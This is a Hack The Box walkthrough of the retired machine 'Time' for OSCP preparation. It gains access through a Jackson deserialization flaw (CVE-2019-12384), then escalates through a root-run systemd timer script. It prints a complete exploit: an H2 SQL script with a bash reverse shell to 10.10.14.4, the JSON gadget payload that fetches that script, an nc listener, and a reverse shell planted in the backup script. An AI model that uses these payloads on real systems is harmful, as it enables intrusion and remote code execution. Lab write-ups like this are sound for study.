OSCP Preparations – HTB Time

Time is a retired Linux machine on Hack The Box. The goal is to obtain the user and root flags by exploiting the vulnerabilities described below.
We start with an nmap scan to get to know the target machine.
Classic Scan

Full Port Scan

The port scan shows two open ports: 22/tcp (OpenSSH 8.2p1) and 80/tcp (Apache). This OpenSSH version offers no useful attack surface, so we concentrate our enumeration on port 80.
We ran file and directory brute-forcing against the web server.
Gobuster scan

The file and directory scan returned nothing useful.
We also checked the browser developer tools, the page source and Wappalyzer, and found nothing of interest.

Looking at the input form, the page offers two operations on the JSON we submit: Beautify and Validate.
Let's submit some JSON and see how it is parsed.

The output for the JSON {"name": "muhammed", "surname": "aygun", "age": "null"} is:

Now let's parse the same input with Validate.

Validate returns:
Validation failed: Unhandled Java exception: com.fasterxml.jackson.databind.exc.MismatchedInputException: Unexpected token (START_OBJECT), expected START_ARRAY: need JSON Array to contain As.WRAPPER_ARRAY type information for class java.lang.Object
We got an error, and a very informative one.
It tells us that the JSON we submit is parsed on the server by Jackson (com.fasterxml.jackson.databind). The exception asks for "As.WRAPPER_ARRAY type information for class java.lang.Object", which is what an ObjectMapper with default typing enabled says when it deserializes untrusted input into java.lang.Object and the input is a plain object rather than a ["class name", {...}] array.
Let's investigate this error. Is there an exploit for it?

Investigating the error, we find that this is a known Jackson deserialization issue, explained very well at https://blog.doyensec.com/2019/07/22/jackson-gadgets.html (CVE-2019-12384). Because default typing is enabled, the application accepts a class name inside JSON sent by an untrusted client and instantiates that class. With logback and the H2 database on the classpath, the ch.qos.logback.core.db.DriverManagerConnectionSource gadget turns this into an SSRF (the server opens a JDBC URL we control) and then RCE (H2's INIT=RUNSCRIPT fetches and executes SQL from our server). The root cause on the server side is ObjectMapper.enableDefaultTyping(); the fix is to not enable it, or on Jackson 2.10+ to use activateDefaultTyping with a PolymorphicTypeValidator allowlist. Let's search Google for a working exploit.

We came across a GitHub repo, and here is the procedure according to it:

  1. Create the inject.sql file with the following contents. It defines an H2 alias backed by a Java method that runs its argument with bash -c, then calls the alias with a reverse shell to our listener (10.10.14.4:4747 is the attacker's address in this walkthrough; adjust it to your own).

-- H2 user-defined function: runs its argument through "bash -c" and returns stdout
CREATE ALIAS SHELLEXEC AS $$ String shellexec(String cmd) throws java.io.IOException {
String[] command = {"bash", "-c", cmd};
java.util.Scanner s = new java.util.Scanner(Runtime.getRuntime().exec(command).getInputStream()).useDelimiter("\\A");
return s.hasNext() ? s.next() : ""; }
$$;
-- Call it with a bash reverse shell back to our listener
CALL SHELLEXEC('bash -i >& /dev/tcp/10.10.14.4/4747 0>&1')

  2. python3 -m http.server
    Run this in the directory containing inject.sql. It serves the file on port 8000 so the target can fetch it.
  3. nc -lvnp 4747
    We listen on this port for the reverse shell.
  4. In the vulnerable application's Validate input, submit:
    ["ch.qos.logback.core.db.DriverManagerConnectionSource", {"url": "jdbc:h2:mem:;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'http://10.10.14.4:8000/inject.sql'"}]
    The server instantiates the named class, opens the JDBC URL, and H2 fetches and runs our script during initialisation.

After the payload ran, the listener caught our shell as the pericles user.
This gives us the user flag.

The user flag is ours, but we cannot read /root without root privileges, so we move on to local enumeration for privilege escalation.

Local enumeration turns up /usr/bin/timer_backup.sh. Let's look at the contents of this file.

The "timer" part of the name draws our attention: let's find timer_backup.timer and see what it does.

The timer triggers timer_backup.service.
Let's look at timer_backup.service.

This unit runs /usr/bin/timer_backup.sh (linpeas.sh also listed it among the interesting files).
Let's look at the content and ownership of that script.

The file is a bash script that does some backup work, and it is owned by pericles, the user we already have. Since the timer runs the service as root (a system unit without a User= line runs as root), anything we write into this script is executed as root the next time the timer fires. So we add a reverse shell to the script, start a listener, and wait for the timer.
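The check behind this step, generalised, added here as an example and not the writeup's own tooling (on the box linpeas reported the file): parse *.service unit files, keep the ones that run as root, and test whether the current user can write to any of their Exec* targets. The demo unit files it creates in a temporary directory are constructed for the example, not copied from the machine.

```python
import os
import re
import tempfile
from pathlib import Path
from typing import List, Tuple

# Added example, not part of the writeup: looks for the pattern exploited above,
# a systemd service that runs as root but whose Exec* target the current user can
# write to. The demo unit files are constructed here, not taken from the box.

UNIT_DIRS = ["/etc/systemd/system", "/lib/systemd/system", "/usr/lib/systemd/system"]

# Exec*=<path> ...; systemd allows prefix characters such as '-' or '@' before the path
EXEC_RE = re.compile(r"^\s*Exec\w*\s*=\s*[-@+!:]*(\S+)", re.M)
USER_RE = re.compile(r"^\s*User\s*=\s*(\S+)", re.M)


def exec_paths(unit_text: str) -> List[str]:
    """Executable paths named by the Exec* directives of a unit file."""
    return EXEC_RE.findall(unit_text)


def runs_as_root(unit_text: str) -> bool:
    """A system unit without User= (or with User=root) runs as root."""
    m = USER_RE.search(unit_text)
    return m is None or m.group(1) == "root"


def writable_root_exec(unit_dirs: List[str] = UNIT_DIRS) -> List[Tuple[str, str]]:
    """(unit name, path) for every root-run Exec* target the current user may write."""
    hits = []
    for d in unit_dirs:
        base = Path(d)
        if not base.is_dir():
            continue
        for unit in sorted(base.glob("*.service")):
            text = unit.read_text(errors="replace")
            if not runs_as_root(text):
                continue
            for path in exec_paths(text):
                if os.access(path, os.W_OK):  # real permission check for this uid
                    hits.append((unit.name, path))
    return hits


def make_demo_dir() -> Tuple[str, str]:
    """Constructed sample: a root-run service whose ExecStart script belongs to us,
    plus a service pinned to an unprivileged user (not interesting)."""
    d = tempfile.mkdtemp(prefix="units_")
    script = os.path.join(d, "timer_backup.sh")
    with open(script, "w") as f:
        f.write("#!/bin/bash\n# stand-in for the backup script\n")
    os.chmod(script, 0o755)
    with open(os.path.join(d, "timer_backup.service"), "w") as f:
        f.write(f"[Unit]\nDescription=Backup\n\n[Service]\nExecStart={script}\n")
    with open(os.path.join(d, "unprivileged.service"), "w") as f:
        f.write(f"[Service]\nUser=nobody\nExecStart={script}\n")
    return d, script


if __name__ == "__main__":
    demo_dir, _ = make_demo_dir()
    for unit, path in writable_root_exec([demo_dir] + UNIT_DIRS):
        print(f"{unit}: {path} is writable by uid {os.getuid()}")
```

Run it as the low-privileged user; every hit is a root shell waiting for the next timer tick. A unit file that is itself writable is just as bad (you can change ExecStart or add User=), and so is a writable directory anywhere along the script's path, so extend the check to those before declaring a box clean.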

We got a root shell.

That's how we obtained root on Time.
